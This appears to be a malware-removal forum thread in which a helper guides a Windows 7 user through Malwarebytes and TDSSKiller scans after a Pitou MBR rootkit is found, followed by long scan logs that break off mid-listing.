C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-01-04 03:11

==================== End of FRST.txt ============================

Addition.txt


So what is the situation so far...?

Uninstalling unwanted / unnecessary programs:

  • Press the Windows key + R on your keyboard at the same time. Type (copy) appwiz.cpl into the box and click OK.
  • In the list of installed programs that opens, right-click the following program:
Quote

RogueKiller version 13.0.20.0

...and then click Uninstall..!

 

 

Scan with Malwarebytes Anti-Malware (MBAM)

Please download Malwarebytes Anti-Malware and save it to your desktop.

  • Run the file mb3-setup-consumer-x.x.x.xxxx.exe and follow the prompts to install the program.
  • Once the installation is complete, the program will start automatically.
  • Go to the Settings => Protection tab and, under the Scan Options category, enable the "Scan for rootkits" option by moving the slider to the right.
  • Go to the Scan tab, select Threat Scan, and then click the Start Scan button.
  • A scan for malware will begin.
  • With some infections you may see the message:
  • "Could not load DDA driver"
  • Click "Yes" on this message to allow the driver to load after a restart.
  • Allow the computer to restart and then continue with the remaining instructions.
  • When the scan finishes, the list of results will appear (if any items were found). If the program was minimized while scanning, the following message will appear if threats were detected. Click the View Scan Results button.
  • Click the Quarantine Selected button.
  • Wait for the window prompting you to restart to appear, and then click the Yes button.
  • After the restart, start Malwarebytes Anti-Malware again.
  • Go to the Reports tab and open the log file named Scan Report.
  • Click the Export button and then => "Copy to Clipboard"
  • Now paste the contents of the log file with the Ctrl + V key combination and post it in your next comment.

Logs

In your next reply, please include the following logs:

  • Log from Malwarebytes Anti-Malware



The system is working better now

 

Malwarebytes
www.malwarebytes.com

-Детайли за регистъра-
Дата на сканиране: 4.01.19 г.
Час на сканиране: 18:54
Файл на регистъра: d14c9b0c-1049-11e9-8809-002713343a56.json

-Информация за софтуера-
Версия: 3.6.1.2711
Версия на компонентите: 1.0.508
Актуализирай версията на пакета: 1.0.8625
Лиценз: Пробен период

-Системна информация-
OS: Windows 7 Service Pack 1
CPU: x86
Файлова система: NTFS
Потребител: WIN-SKFJ6HLGST2\\u00d0\u0092\u00d0\u0095\u00d0\u00a1

-Резюме на сканирането-
Тип сканиране: Threat Scan
Сканирането е стартирано от: Ръчно
Резултат: Завършено
Сканирани обекти: 148014
Открити заплахи: 2
Заплахи под карантина: 2
Изтекло време: 3 мин, 10 сек

-Опции за сканиране-
Памет: Разрешено
Стартиране: Разрешено
Файлова система: Разрешено
Архиви: Разрешено
руткитове: Разрешено
Евристика: Разрешено
PUP: Открий
PUM: Открий

-Детайли за сканирането-
Процес: 0
(Не бяха открити зловредни елементи)

Модул: 0
(Не бяха открити зловредни елементи)

Ключ на регистъра: 0
(Не бяха открити зловредни елементи)

Стойност на регистъра: 0
(Не бяха открити зловредни елементи)

Данни на регистъра: 0
(Не бяха открити зловредни елементи)

Поток данни: 0
(Не бяха открити зловредни елементи)

Папка: 0
(Не бяха открити зловредни елементи)

Файл: 0
(Не бяха открити зловредни елементи)

Физически сектор: 2
Rootkit.Pitou.c.MBR, 0, Смяна при рестартиране, [15352], [514127],0.0.0
Forged physical sector, 0, Смяна при рестартиране, [0], [0],0.0.0

WMI: 0
(Не бяха открити зловредни елементи)


(end)

Quote

Rootkit.Pitou.c.MBR, 0, Смяна при рестартиране, [15352], [514127],0.0.0
Forged physical sector, 0, Смяна при рестартиране, [0], [0],0.0.0

Restart your computer...! And then, based on these entries from the last scan:

Scan with TDSSKiller

Please download the latest version of TDSSKiller from here and save it to your desktop (mandatory).

  • Click TDSSKiller.exe to start the application
  • Click the Start Scan button.
  • Do not use the computer during the scan
  • If the scan finishes with nothing found, click Close to exit.
  • The scan should not take more than 2 minutes.
  • If a suspicious object is detected, the default action will be Skip; click Continue.
  • If malicious objects are found, you will have three options in the drop-down menu.
    Make sure the selected action is Cure and click Continue > Restart to complete the repair.

    Note: If the Cure button is not among the available options, please choose the Skip button; do not choose Delete unless you have been instructed to.

A log file will be created in the root directory of the C: partition. Look for a log named "TDSSKiller.[Version]_[Date]_[Time]_log.txt" and copy its contents into your next post.


19:28:10.0584 0x0ebc  TDSS rootkit removing tool 3.1.0.25 Dec 24 2018 06:31:07
19:28:15.0968 0x0ebc  ============================================================
19:28:15.0968 0x0ebc  Current date / time: 2019/01/04 19:28:15.0968
19:28:15.0968 0x0ebc  SystemInfo:
19:28:15.0968 0x0ebc  
19:28:15.0968 0x0ebc  OS Version: 6.1.7601 ServicePack: 1.0
19:28:15.0968 0x0ebc  Product type: Workstation
19:28:15.0969 0x0ebc  ComputerName: WIN-SKFJ6HLGST2
19:28:15.0969 0x0ebc  UserName: ВЕС
19:28:15.0969 0x0ebc  Windows directory: C:\Windows
19:28:15.0969 0x0ebc  System windows directory: C:\Windows
19:28:15.0969 0x0ebc  Processor architecture: Intel x86
19:28:15.0969 0x0ebc  Number of processors: 2
19:28:15.0969 0x0ebc  Page size: 0x1000
19:28:15.0969 0x0ebc  Boot type: Normal boot
19:28:15.0970 0x0ebc  CodeIntegrityOptions = 0x00000000
19:28:15.0970 0x0ebc  ============================================================
19:28:20.0907 0x0ebc  KLMD registered as C:\Windows\system32\drivers\65300919.sys
19:28:20.0907 0x0ebc  KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 7601.17514, osProperties = 0x0
19:28:21.0166 0x0ebc  System UUID: {A8E52CEA-BEC2-A704-09F4-DDADC690A2B5}
19:28:21.0563 0x0ebc  Drive \Device\Harddisk0\DR0 - Size: 0x7470C06000 ( 465.76 Gb ), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
19:28:21.0581 0x0ebc  ============================================================
19:28:21.0581 0x0ebc  \Device\Harddisk0\DR0:
19:28:21.0581 0x0ebc  MBR partitions:
19:28:21.0581 0x0ebc  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
19:28:21.0581 0x0ebc  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0xC834000
19:28:21.0581 0x0ebc  \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0xC866800, BlocksNum 0x2DA3E000
19:28:21.0582 0x0ebc  ============================================================
19:28:21.0613 0x0ebc  C: <-> \Device\Harddisk0\DR0\Partition2
19:28:21.0641 0x0ebc  D: <-> \Device\Harddisk0\DR0\Partition3
19:28:21.0675 0x0ebc  H: <-> \Device\Harddisk0\DR0\Partition1
19:28:21.0675 0x0ebc  ============================================================
19:28:21.0675 0x0ebc  Initialize success
19:28:21.0675 0x0ebc  ============================================================
19:28:24.0645 0x0744  ============================================================
19:28:24.0645 0x0744  Scan started
19:28:24.0645 0x0744  Mode: Manual; 
19:28:24.0645 0x0744  ============================================================
19:28:24.0646 0x0744  KSN ping started
19:28:27.0396 0x0744  KSN ping finished: true
19:28:28.0829 0x0744  ================ Scan BIOS =================================
19:28:28.0831 0x0744  BIOS info: vendor = Hewlett-Packard, version = 68PCU Ver. F.20, releaseDate = 12/08/2011
19:28:28.0831 0x0744  Base board info: manufacturer = Hewlett-Packard, product = 30DB, version = KBC Version 87.2B
19:28:36.0192 0x0744  [ 86000431CDB982F490384FFA47386F63, B831A27F0DE9D10A6BA8CB5E7E219459525A39BC1E098BC3F4A1E11672591EC8 ] BIOS
19:28:39.0192 0x0744  BIOS - ok
19:28:39.0199 0x0744  ================ Scan system memory ========================
19:28:39.0202 0x0744  System memory - ok
19:28:39.0204 0x0744  ================ Scan services =============================
19:28:46.0757 0x0744  [ FB18CC1D4C2E716B6B903B0AC0CC0609, F10CCA63493782B16DE6B96B94A27078DBE68AECEF34FDF840CFF86D2C6E3C5E ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
19:28:46.0758 0x0744  mouclass - ok
19:28:46.0763 0x0744  [ 2C388D2CD01C9042596CF3C8F3C7B24D, B2FB72272BB01AEDA4047B57C943B7E9BD8A6497854F8CC34672AAA592D0A703 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
19:28:46.0765 0x0744  mouhid - ok
19:28:46.0771 0x0744  [ FC8771F45ECCCFD89684E38842539B9B, 806DDF2B4830CA866582FE74A521BB7DF26CA0E19013DAF584D3677FB48CC77A ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
19:28:46.0776 0x0744  mountmgr - ok
19:28:46.0784 0x0744  [ 2D699FB6E89CE0D8DA14ECC03B3EDFE0, D3D903EEA465D77345AAC9B9F02CDEADF4831212EA2DE4FCA33BEE26EBB47420 ] mpio            C:\Windows\system32\drivers\mpio.sys
19:28:46.0788 0x0744  mpio - ok
19:28:46.0795 0x0744  [ AD2723A7B53DD1AACAE6AD8C0BFBF4D0, 1D6DCFA0E56C3E55B6AED819176E751502F863BA0FCF4F0B3253A81D208141A2 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
19:28:46.0797 0x0744  mpsdrv - ok
19:28:46.0824 0x0744  [ 9835584E999D25004E1EE8E5F3E3B881, 71798B0CBE9AE69F1F29B845319019C69EC7F415CBABB3B87DDE92C360675021 ] MpsSvc          C:\Windows\system32\mpssvc.dll
19:28:46.0840 0x0744  MpsSvc - ok
19:28:46.0848 0x0744  [ CEB46AB7C01C9F825F8CC6BABC18166A, AA98898204FC58878502C170FE6ED8BA681396DDD8BF3689D0C3642DEA87BEF8 ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
19:28:46.0851 0x0744  MRxDAV - ok
19:28:46.0901 0x0744  [ B272B4C3E085EA860C12F2E4FAF2FFA2, DA99D8223D9FB7BFA52E66B73D1E1AA47B76B45A649400F7898E8D65D8672E52 ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
19:28:46.0905 0x0744  mrxsmb - ok
19:28:46.0915 0x0744  [ 9AC33EF26C8A3AD0F117D00EB7301D03, 403445B07DC55F9DF98CA11AC87D4231187A2472A4E107786A5845B213355F0A ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
19:28:46.0921 0x0744  mrxsmb10 - ok
19:28:46.0930 0x0744  [ E0ABDB5ED7E199E242A7D028E76C1D3A, 4014A1F0720F6D15A2FB0CF4F1F970595BC29929F92F461CDD68E4513F49563E ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
19:28:46.0933 0x0744  mrxsmb20 - ok
19:28:46.0938 0x0744  [ 012C5F4E9349E711E11E0F19A8589F0A, 208B92DFCF7AD43202660FBBC9FF5E03AEDBEE38178FF3628EB74CB6CD37C584 ] msahci          C:\Windows\system32\drivers\msahci.sys
19:28:46.0939 0x0744  msahci - ok
19:28:46.0948 0x0744  [ 55055F8AD8BE27A64C831322A780A228, C2C9FD1F61302997117B1CD0835E8234405BB80084065ED05363B77868397304 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
19:28:46.0951 0x0744  msdsm - ok
19:28:46.0970 0x0744  [ E1BCE74A3BD9902B72599C0192A07E27, 5162EB623FE64E9DFEAC6CA2410EFA1314E62EC13207FFBFED2D61AA887603C4 ] MSDTC           C:\Windows\System32\msdtc.exe
19:28:46.0975 0x0744  MSDTC - ok
19:28:46.0982 0x0744  [ DAEFB28E3AF5A76ABCC2C3078C07327F, 6EB558532400B489763BAE7203538DE5F196282A8CB46A1B31D59120FC5AFCEF ] Msfs            C:\Windows\system32\drivers\Msfs.sys
19:28:46.0984 0x0744  Msfs - ok
19:28:46.0990 0x0744  [ 3E1E5767043C5AF9367F0056295E9F84, B2EDFECD3C14E4FE1BA87D9A86334043A9BD696A554EBD186DA7EAEB2EBD4F70 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
19:28:46.0991 0x0744  mshidkmdf - ok
19:28:46.0997 0x0744  [ 0A4E5757AE09FA9622E3158CC1AEF114, ED574E420E57374E328C7C526504ECA569C164287966F06019EC207CB17F2C54 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
19:28:46.0998 0x0744  msisadrv - ok
19:28:47.0035 0x0744  [ 90F7D9E6B6F27E1A707D4A297F077828, BEFC220EAA7307849600748842ACB9254A6A91158812D9B23EFAF912C498BA7F ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
19:28:47.0048 0x0744  MSiSCSI - ok
19:28:47.0057 0x0744  msiserver - ok
19:28:47.0086 0x0744  [ 8C0860D6366AAFFB6C5BB9DF9448E631, 949C5A14E57F2D7385543C17C3485E7ADE36EA2016F6E0A1866571D2EDE90A77 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
19:28:47.0088 0x0744  MSKSSRV - ok
19:28:47.0109 0x0744  [ 3EA8B949F963562CEDBB549EAC0C11CE, 1B0B2F16A1790282504F3C548D47C3281EFB440D5D9711A1EF76D6371B768D2D ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
19:28:47.0111 0x0744  MSPCLOCK - ok
19:28:47.0117 0x0744  [ F456E973590D663B1073E9C463B40932, 48BA6D5580EE7B6A4C06E04772FD35B51779553FC0DD6C5C30DD8B5DEEB25B11 ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
19:28:47.0118 0x0744  MSPQM - ok
19:28:47.0135 0x0744  [ 0E008FC4819D238C51D7C93E7B41E560, 141FCEBDD05874407EAEC35A9DCD3BB16F2A428F23E55487D6A5DBFCADBF10D2 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
19:28:47.0140 0x0744  MsRPC - ok
19:28:47.0147 0x0744  [ FC6B9FF600CC585EA38B12589BD4E246, F05DB01AE1955D2468CE6B51E51998B111CA3B0BDEED090EE6B99B625CBA564A ] mssmbios        C:\Windows\system32\DRIVERS\mssmbios.sys
19:28:47.0149 0x0744  mssmbios - ok
19:28:47.0154 0x0744  [ B42C6B921F61A6E55159B8BE6CD54A36, 6BB0A7BE005B8F281E551D1B8046CE4202372BC7AE0161881C858BFAC675FE1C ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
19:28:47.0156 0x0744  MSTEE - ok
19:28:47.0160 0x0744  [ 33599130F44E1F34631CEA241DE8AC84, E15B31D1AFDC8DC6D2B21D4215796A99ECC69EEDBB06CEED01AECC3C99A44C8B ] MTConfig        C:\Windows\system32\drivers\MTConfig.sys
19:28:47.0162 0x0744  MTConfig - ok
19:28:47.0169 0x0744  [ 159FAD02F64E6381758C990F753BCC80, E55AB01DCFA95ECAB24A2A9656E28FF9D064BA08B3D82DC8AA42F5991BA09598 ] Mup             C:\Windows\system32\Drivers\mup.sys
19:28:47.0171 0x0744  Mup - ok
19:28:47.0205 0x0744  [ 61D57A5D7C6D9AFE10E77DAE6E1B445E, D252248532142E9E2332DA693BC51B795102CA938B568FF04981E98B19BFBC5C ] napagent        C:\Windows\system32\qagentRT.dll
19:28:47.0215 0x0744  napagent - ok
19:28:47.0268 0x0744  [ 26384429FCD85D83746F63E798AB1480, 957C115C263A4B4DC854558B43ECE632D8E2BCCB744E23A01EBA7476BA2E7FFB ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
19:28:47.0275 0x0744  NativeWifiP - ok
19:28:47.0300 0x0744  [ E7C54812A2AAF43316EB6930C1FFA108, C8A6FC1957FA29A3B372132FEA9145538BC767044A11D77316D3D1A3EAA60630 ] NDIS            C:\Windows\system32\drivers\ndis.sys
19:28:47.0383 0x0744  NDIS - ok
19:28:47.0431 0x0744  [ 0E1787AA6C9191D3D319E8BAFE86F80C, F535022747355B2C66424BDA892D7DCB820C2EB8EE05BAE5BC6D1B1D65186278 ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
19:28:47.0433 0x0744  NdisCap - ok
19:28:47.0454 0x0744  [ E4A8AEC125A2E43A9E32AFEEA7C9C888, 6EA181117126FC70B3C1DD1AC73CC26D1603A2CF49E47F66623E2C9489C49B55 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
19:28:47.0456 0x0744  NdisTapi - ok
19:28:47.0465 0x0744  [ D8A65DAFB3EB41CBB622745676FCD072, 874D3C3D247C4A309DA813DB1D2EDB0037D3C489824BD5FE95B0C20699764EF7 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
19:28:47.0467 0x0744  Ndisuio - ok
19:28:47.0474 0x0744  [ 38FBE267E7E6983311179230FACB1017, CFD1CBCA59650795C030DB30E5795B37C11C736E14003AE1DAB081BA5C0C9B14 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
19:28:47.0478 0x0744  NdisWan - ok
19:28:47.0483 0x0744  [ A4BDC541E69674FBFF1A8FF00BE913F2, 18CCFD063E9870B8B6958715BC0414C4D920AE63528EA1E9D7E30F7138918FFA ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
19:28:47.0485 0x0744  NDProxy - ok
19:28:47.0490 0x0744  [ 80B275B1CE3B0E79909DB7B39AF74D51, 75B406B0D9D28239D4EB2A298419A5F78A58237D88C5FD688EF1DFFAFACCF796 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
19:28:47.0492 0x0744  NetBIOS - ok
19:28:47.0537 0x0744  [ 280122DDCF04B378EDD1AD54D71C1E54, F98B2ADE34F7E67C7C06C1D0FFB80ECBC353D044D4B4784CD952910345DC2ED0 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
19:28:47.0549 0x0744  NetBT - ok
19:28:47.0573 0x0744  [ F42309C4191C506B71DB5D1126D26318, 29B0A8889857CEBFA6CBD795D5EECDDFFA04E794BD3C73FC488725B2A160F326 ] Netlogon        C:\Windows\system32\lsass.exe
19:28:47.0575 0x0744  Netlogon - ok
19:28:47.0631 0x0744  [ 7CCCFCA7510684768DA22092D1FA4DB2, BB9E4F8FABBF596D888E6D303CB54A336D9DFF95B36AEA9369D2ED787DDC4B5D ] Netman          C:\Windows\System32\netman.dll
19:28:47.0640 0x0744  Netman - ok
19:28:47.0663 0x0744  [ 8C338238C16777A802D6A9211EB2BA50, 0D08A47CD403EDA5E8CAD7409BBBBCDC29A9861D2DC41D42B68B22B1AA1EBDD6 ] netprofm        C:\Windows\System32\netprofm.dll
19:28:47.0674 0x0744  netprofm - ok
19:28:47.0707 0x0744  [ F476EC40033CDB91EFBE73EB99B8362D, B17535037BC070F9AE1F6B381C2DBEE27658A8FDE15FB0E061F485EA7C7CBE59 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
19:28:47.0712 0x0744  NetTcpPortSharing - ok
19:28:47.0896 0x0744  [ 58218EC6B61B1169CF54AAB0D00F5FE2, B76ABB2AD78CE68D30F0F08563B0593D658298CDCF1B138B6E9FB0D64CBCC3C2 ] netw5v32        C:\Windows\system32\DRIVERS\netw5v32.sys
19:28:48.0062 0x0744  netw5v32 - ok
19:28:48.0121 0x0744  [ 1D85C4B390B0EE09C7A46B91EFB2C097, 6A8850B151E88EE371F3CC543A946302DDF9494908D684B8B0C706A42CC54348 ] nfrd960         C:\Windows\system32\drivers\nfrd960.sys
19:28:48.0126 0x0744  nfrd960 - ok
19:28:48.0163 0x0744  [ 912084381D30D8B89EC4E293053F4710, 99B8CD043DF531D4B9725ED167F63CED220608B2FED3EE8250C217D15762DFD7 ] NlaSvc          C:\Windows\System32\nlasvc.dll
19:28:48.0174 0x0744  NlaSvc - ok
19:28:48.0182 0x0744  [ 1DB262A9F8C087E8153D89BEF3D2235F, A51EE5D5AD3CD76B74BEA9C66C462608BF3B50C53DAA4110A75DB10495A8C101 ] Npfs            C:\Windows\system32\drivers\Npfs.sys
19:28:48.0185 0x0744  Npfs - ok
19:28:48.0200 0x0744  [ BA387E955E890C8A88306D9B8D06BF17, 3477BD9686C5777A93251C154512671AAA7533B18C536DF51F7B1D6D28E7F8A5 ] nsi             C:\Windows\system32\nsisvc.dll
19:28:48.0203 0x0744  nsi - ok
19:28:48.0214 0x0744  [ E9A0A4D07E53D8FEA2BB8387A3293C58, 690CAD6C4E35ECC1172A2E1FD3933DF73158B3BF42CB21244269612A53DE4D7A ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
19:28:48.0215 0x0744  nsiproxy - ok
19:28:48.0274 0x0744  [ 33C3093D09017CFE2E219F2472BFF6EB, DE46C7A53C3606F036DED1EE8A81B79CAF3171A7E97DA2F71712E2DA046A262E ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
19:28:48.0303 0x0744  Ntfs - ok
19:28:48.0320 0x0744  [ F9756A98D69098DCA8945D62858A812C, 572ADBFCFDE2030B34A013AADC14DBC144EB3F34D06991E2464A3EA9605BC045 ] Null            C:\Windows\system32\drivers\Null.sys
19:28:48.0322 0x0744  Null - ok
19:28:48.0357 0x0744  [ AF2EEC9580C1D32FB7EAF105D9784061, 6DAAE3BCA048ACD7FFD26A65C793C461933179070F03855FE3DC3C01F968163A ] nvraid          C:\Windows\system32\drivers\nvraid.sys
19:28:48.0363 0x0744  nvraid - ok
19:28:48.0370 0x0744  [ 9283C58EBAA2618F93482EB5DABCEC82, 0BC119D4EAFDEA879E4C1CFBA5402499DBD1970EDF963C6D2034D4867C34D15E ] nvstor          C:\Windows\system32\drivers\nvstor.sys
19:28:48.0375 0x0744  nvstor - ok
19:28:48.0395 0x0744  [ 5A0983915F02BAE73267CC2A041F717D, D83461D74597BF2BE042FEFCC27FCD18BF63CB8135B0666D731D50951C3468A8 ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
19:28:48.0399 0x0744  nv_agp - ok
19:28:48.0404 0x0744  [ 08A70A1F2CDDE9BB49B885CB817A66EB, 0BB98123B544124B144F3E95D77E01E973D060B8B2302503FF24ABBBE803EB63 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
19:28:48.0407 0x0744  ohci1394 - ok
19:28:48.0443 0x0744  [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
19:28:48.0453 0x0744  p2pimsvc - ok
19:28:48.0470 0x0744  [ 59C3DDD501E39E006DAC31BF55150D91, E02B63AB7F34CF6FF3F644AF354D10004E6F50014E03172D80BD78934EF71EF1 ] p2psvc          C:\Windows\system32\p2psvc.dll
19:28:48.0481 0x0744  p2psvc - ok
19:28:48.0487 0x0744  [ 2EA877ED5DD9713C5AC74E8EA7348D14, 14BA3722CE5F8FF07F2D97DCDD6558EB49C9B02E5E6FAD6D9F18D354733EFECE ] Parport         C:\Windows\system32\DRIVERS\parport.sys
19:28:48.0490 0x0744  Parport - ok
19:28:48.0495 0x0744  [ BF8F6AF06DA75B336F07E23AEF97D93B, 2F2C4314872732550A112BFF2F803484D4A3D697F0D69D352350CE208FD8A1A4 ] partmgr         C:\Windows\system32\drivers\partmgr.sys
19:28:48.0497 0x0744  partmgr - ok
19:28:48.0504 0x0744  [ EB0A59F29C19B86479D36B35983DAADC, AC09AFE7F13BE4079D01383BAC44091997E1AAF6512C9673A42B9E3780EB08A8 ] Parvdm          C:\Windows\system32\DRIVERS\parvdm.sys
19:28:48.0505 0x0744  Parvdm - ok
19:28:48.0513 0x0744  [ 358AB7956D3160000726574083DFC8A6, 6CAFD4D1B8AB8C1D167ADC018985DDAB5AC2CBFFB3434FE6390F14AF50C19025 ] PcaSvc          C:\Windows\System32\pcasvc.dll
19:28:48.0519 0x0744  PcaSvc - ok
19:28:48.0541 0x0744  [ 673E55C3498EB970088E812EA820AA8F, 1F81315664B8CBFDD569416C0ECCE4C6251F34577313A0858AB46609781303B5 ] pci             C:\Windows\system32\drivers\pci.sys
19:28:48.0545 0x0744  pci - ok
19:28:48.0550 0x0744  [ AFE86F419014DB4E5593F69FFE26CE0A, CAF36E61BE7B511D3A03A65FF5A3017CEE4D2F53005B410F2D4A2AAE9FED4C00 ] pciide          C:\Windows\system32\drivers\pciide.sys
19:28:48.0551 0x0744  pciide - ok
19:28:48.0560 0x0744  [ F396431B31693E71E8A80687EF523506, BC614FC21E029E2497F1CCE3131BBD295B827F2310762B47D5BBC7703D80554B ] pcmcia          C:\Windows\system32\DRIVERS\pcmcia.sys
19:28:48.0565 0x0744  pcmcia - ok
19:28:48.0570 0x0744  [ 250F6B43D2B613172035C6747AEEB19F, A91F15B133F2619912CF750E6F3662E011CD0FA4B9477CE532CE3196D23307D9 ] pcw             C:\Windows\system32\drivers\pcw.sys
19:28:48.0572 0x0744  pcw - ok
19:28:48.0591 0x0744  [ 9E0104BA49F4E6973749A02BF41344ED, B32F39F38DB48D77FBA884DEE34112BAB81CCEF5DD2EAAA12D9589D73D2BB116 ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
19:28:48.0607 0x0744  PEAUTH - ok
19:28:48.0663 0x0744  [ AF4D64D2A57B9772CF3801950B8058A6, C9C493A3775E6E1660CE5DF75DA574D0C04245FB88CF41B96217A725359C350D ] PeerDistSvc     C:\Windows\system32\peerdistsvc.dll
19:28:48.0689 0x0744  PeerDistSvc - ok
19:28:48.0786 0x0744  [ 414BBA67A3DED1D28437EB66AEB8A720, D6DF254E2615FA402044824DCD9004F579FC0DF74B90E44C99D5F0253CF8AD88 ] pla             C:\Windows\system32\pla.dll
19:28:48.0836 0x0744  pla - ok
19:28:48.0906 0x0744  [ 92DC6E68D2C856C5C2F21AE9E22112B8, EFAA27886A05E57E629A9EFC3671D9D64144795EDF55438A676F5B43E59BE3FC ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
19:28:48.0924 0x0744  PlugPlay - ok
19:28:48.0946 0x0744  [ 63FF8572611249931EB16BB8EED6AFC8, 9732CCBCB93A7A4BEC88812B952C20244479E9BD781240C195E57F09E619EA33 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
19:28:48.0950 0x0744  PNRPAutoReg - ok
19:28:48.0965 0x0744  [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
19:28:48.0972 0x0744  PNRPsvc - ok
19:28:49.0021 0x0744  [ 53946B69BA0836BD95B03759530C81EC, 7F14A34635354CCA0F5342C8D9DF5A6AA1B94F6A508BD8834029E9BACF252920 ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
19:28:49.0042 0x0744  PolicyAgent - ok
19:28:49.0053 0x0744  [ F87D30E72E03D579A5199CCB3831D6EA, B09328E89954584F97908FA5946376BA990B8C650DABCBF3CA3B08719937C694 ] Power           C:\Windows\system32\umpo.dll
19:28:49.0059 0x0744  Power - ok
19:28:49.0095 0x0744  [ 631E3E205AD6D86F2AED6A4A8E69F2DB, 1D3BF0CFC37D91A3A56246920B9CF1084E78A055D56E85A773417809C58C8065 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
19:28:49.0098 0x0744  PptpMiniport - ok
19:28:49.0106 0x0744  [ 85B1E3A0C7585BC4AAE6899EC6FCF011, 1E067113C146D6842D7FB04007F363D6FB7783C6BC7C9AB6614E44075C4F86C3 ] Processor       C:\Windows\system32\drivers\processr.sys
19:28:49.0108 0x0744  Processor - ok
19:28:49.0169 0x0744  [ 43CA4CCC22D52FB58E8988F0198851D0, DF67BD70D9D82677AE61244B4E54677A5008A7F5EB531DF2A7E7D33F1658EA78 ] ProfSvc         C:\Windows\system32\profsvc.dll
19:28:49.0186 0x0744  ProfSvc - ok
19:28:49.0202 0x0744  [ F42309C4191C506B71DB5D1126D26318, 29B0A8889857CEBFA6CBD795D5EECDDFFA04E794BD3C73FC488725B2A160F326 ] ProtectedStorage C:\Windows\system32\lsass.exe
19:28:49.0204 0x0744  ProtectedStorage - ok
19:28:49.0244 0x0744  [ 6270CCAE2A86DE6D146529FE55B3246A, 463209CBAF1B0E269DC8FC6FBDEE5BB7E5ADB5D3F024930BFD0B97E0A9678883 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
19:28:49.0247 0x0744  Psched - ok
19:28:49.0299 0x0744  [ AB95ECF1F6659A60DDC166D8315B0751, 0ED6D3460D28978BADF31B930DBB3298A6A10EFF8883763EABA0E36A21A0E83D ] ql2300          C:\Windows\system32\drivers\ql2300.sys
19:28:49.0385 0x0744  ql2300 - ok
19:28:49.0432 0x0744  [ B4DD51DD25182244B86737DC51AF2270, 7E62B04F054A6330B7F9968222523BDE8F3EE47A11D17E6C0E2D5ACDC07B9E6B ] ql40xx          C:\Windows\system32\drivers\ql40xx.sys
19:28:49.0441 0x0744  ql40xx - ok
19:28:49.0487 0x0744  [ 31AC809E7707EB580B2BDB760390765A, A8481FD19A0F778F5591B7676F591F664ADC68B6867E663C0F9564173F4AC909 ] QWAVE           C:\Windows\system32\qwave.dll
19:28:49.0498 0x0744  QWAVE - ok
19:28:49.0504 0x0744  [ 584078CA1B95CA72DF2A27C336F9719D, 836F115C92D343463C14A9DE39648C1EFA7C7EE4720F5C692EE0F68B84830121 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
19:28:49.0507 0x0744  QWAVEdrv - ok
19:28:49.0514 0x0744  [ 30A81B53C766D0133BB86D234E5556AB, 726C6B83B5ACAA84CAB1689B6DD6DDAE3199D61A57B5D7B5B5A0F62FCF838090 ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
19:28:49.0516 0x0744  RasAcd - ok
19:28:49.0541 0x0744  [ 57EC4AEF73660166074D8F7F31C0D4FD, C66B425EC4DB5E7FD289AE631C9B019EB16717C55E80FAE964BB22203E4AACEF ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
19:28:49.0543 0x0744  RasAgileVpn - ok
19:28:49.0557 0x0744  [ A60F1839849C0C00739787FD5EC03F13, B210DFA5A843CF1DA73635F168E2EA5052CBED15C664F8523CDFB34CA165D0E0 ] RasAuto         C:\Windows\System32\rasauto.dll
